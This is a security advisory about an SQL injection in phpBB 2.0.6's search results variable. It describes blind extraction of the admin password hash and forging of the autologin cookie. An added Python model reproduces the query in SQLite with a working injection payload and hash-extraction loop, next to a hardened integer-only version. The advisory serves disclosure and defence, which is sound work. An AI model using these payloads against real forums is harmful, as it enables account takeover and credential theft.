[UNIX] PhpBB SQL Injection In Search Results Variable

From: SecuriTeam (support_at_securiteam.com)
Date: 03/25/04

    To: list@securiteam.com
    Date: 25 Mar 2004 16:54:46 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      PhpBB SQL Injection In Search Results Variable
    ------------------------------------------------------------------------

    SUMMARY

     phpBB (http://www.phpbb.com/) is "a high powered, fully scalable, and
    highly customizable open-source bulletin board package. phpBB has a
    user-friendly interface, simple and straightforward administration panel,
    and helpful FAQ. Based on the powerful PHP server language and your choice
    of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the
    ideal free community solution for all web sites."

    An SQL injection vulnerability exists in phpBB's search results variable
    ($search_results) when the PHP option register_globals is set to "on".

    DETAILS

    Vulnerable Systems:
     * phpBB version 2.0.6

    An SQL injection exists in the $search_results variable when performing a
    search in phpBB. With register_globals on, a request parameter named
    search_results is imported directly into $search_results, which the query
    built on line 711 (the branch taken when $show_results is not set to
    'posts' or 'topics') interpolates into its IN (...) clause without any
    escaping or validation:

    $sql = "SELECT t.*, f.forum_id, f.forum_name, u.username, u.user_id,
                   u2.username as user2, u2.user_id as id2, p.post_username,
                   p2.post_username AS post_username2, p2.post_time
            FROM " . TOPICS_TABLE . " t, " . FORUMS_TABLE . " f, " . USERS_TABLE . " u,
                 " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2, " . USERS_TABLE . " u2
            WHERE t.topic_id IN ($search_results)
                AND t.topic_poster = u.user_id
                AND f.forum_id = t.forum_id
                AND p.post_id = t.topic_first_post_id
                AND p2.post_id = t.topic_last_post_id
                AND u2.user_id = p2.poster_id";

    The users table is among those joined by this query, so an attacker can
    append conditions to the IN (...) clause that test the administrator's
    password hash one character at a time and observe whether the search
    returns results: a boolean-based blind injection that needs no UNION and
    therefore works against MySQL 3 as well. Once the hash is known, phpBB's
    autologin feature lets the attacker forge the autologin cookie and log in
    as the administrator without cracking the password.

    A proof of concept script can be found at
    http://www.scan-associates.net/papers/gemuruh-v2.php.txt

    Workaround
    Turn off register_globals in the PHP configuration file (php.ini), so that
    request parameters are no longer imported into global variables such as
    $search_results. This blocks the reported vector but does not change the
    query itself, which still interpolates $search_results without validation;
    the variable should also be checked to be a list of integers before it is
    used.
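
    The following Python model is added here as an illustration; it is neither
    the reporter's proof of concept nor phpBB code. It rebuilds the query quoted
    above over an in-memory SQLite database with constructed sample rows, shows
    how a request-supplied search_results value turns the IN (...) clause into a
    boolean oracle that recovers a user_password hash one hex digit at a time,
    and places beside it a hardened form that accepts only a comma-separated
    list of integers and binds them as parameters. The table and column names,
    the sample rows, the hash value (the MD5 of "password") and every function
    name are assumptions of the example; phpBB itself is PHP, where the same
    check would be a regular expression on $search_results before the query is
    built.

```python
import re
import sqlite3

# Constructed sample data modelling the tables the advisory's query joins.
# The hash is MD5("password"); it stands in for a real admin's user_password.
ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"
HEX = "0123456789abcdef"
ID_LIST = re.compile(r"^[0-9]+(,[0-9]+)*$")


def build_db():
    """In-memory SQLite stand-in for the MySQL tables (constructed, not phpBB's schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE phpbb_users  (user_id INTEGER, username TEXT, user_password TEXT);
        CREATE TABLE phpbb_forums (forum_id INTEGER, forum_name TEXT);
        CREATE TABLE phpbb_posts  (post_id INTEGER, poster_id INTEGER,
                                   post_username TEXT, post_time INTEGER);
        CREATE TABLE phpbb_topics (topic_id INTEGER, forum_id INTEGER, topic_poster INTEGER,
                                   topic_first_post_id INTEGER, topic_last_post_id INTEGER);
    """)
    db.executemany("INSERT INTO phpbb_users VALUES (?, ?, ?)",
                   [(2, "admin", ADMIN_HASH), (3, "alice", "0" * 32)])
    db.execute("INSERT INTO phpbb_forums VALUES (1, 'General')")
    db.executemany("INSERT INTO phpbb_posts VALUES (?, ?, ?, ?)",
                   [(10, 3, "", 1000), (11, 3, "", 1001)])
    db.execute("INSERT INTO phpbb_topics VALUES (1, 1, 3, 10, 11)")
    return db


def topic_sql(in_clause):
    """The advisory's query, with the contents of IN (...) supplied by the caller."""
    return f"""
        SELECT t.*, f.forum_id, f.forum_name, u.username, u.user_id,
               u2.username AS user2, u2.user_id AS id2, p.post_username,
               p2.post_username AS post_username2, p2.post_time
        FROM phpbb_topics t, phpbb_forums f, phpbb_users u,
             phpbb_posts p, phpbb_posts p2, phpbb_users u2
        WHERE t.topic_id IN ({in_clause})
          AND t.topic_poster = u.user_id
          AND f.forum_id = t.forum_id
          AND p.post_id = t.topic_first_post_id
          AND p2.post_id = t.topic_last_post_id
          AND u2.user_id = p2.poster_id"""


def vulnerable_topic_query(db, search_results):
    """phpBB 2.0.6 behaviour: $search_results (request-supplied under
    register_globals) is interpolated into the SQL text unescaped."""
    return db.execute(topic_sql(search_results)).fetchall()


def safe_topic_query(db, search_results):
    """Hardened form (added here, not phpBB's fix): accept only a comma-separated
    list of integers and bind them as parameters, so IN (...) can never carry SQL."""
    if not ID_LIST.match(search_results):
        raise ValueError("search_results must be a comma-separated list of integers")
    ids = [int(x) for x in search_results.split(",")]
    return db.execute(topic_sql(",".join("?" * len(ids))), ids).fetchall()


def extract_hash(db, user_id=2, length=32):
    """Boolean-based blind extraction, the technique the advisory describes:
    each payload closes IN (1 ...) and appends a condition on one character of
    the target's hash; a non-empty result set means 'true'. No UNION is needed,
    which is why it also works against MySQL 3."""
    recovered = ""
    for pos in range(1, length + 1):
        for c in HEX:
            payload = (f"1) AND (SELECT SUBSTR(user_password, {pos}, 1) "
                       f"FROM phpbb_users WHERE user_id = {user_id}) = '{c}' AND (1 = 1")
            if vulnerable_topic_query(db, payload):
                recovered += c
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered


def rejects(db, search_results):
    """True if the hardened query refuses the value."""
    try:
        safe_topic_query(db, search_results)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("legit search rows:", len(vulnerable_topic_query(db, "1")))
    print("recovered admin hash:", extract_hash(db))
    print("hardened query rejects payload:", rejects(db, "1) AND (1 = 1"))
```

    Running the script recovers the sample hash with at most 16 requests per
    hex digit; the hardened query answers the legitimate "1" identically and
    refuses the payload outright. Disabling register_globals, as the workaround
    says, removes the request-to-variable path; the integer-list check is the
    defence in depth that also covers any future code path that fills
    $search_results from user input.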

    ADDITIONAL INFORMATION

    The information has been provided by pokley (pokleyzz@scan-associates.net).

    ========================================


    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

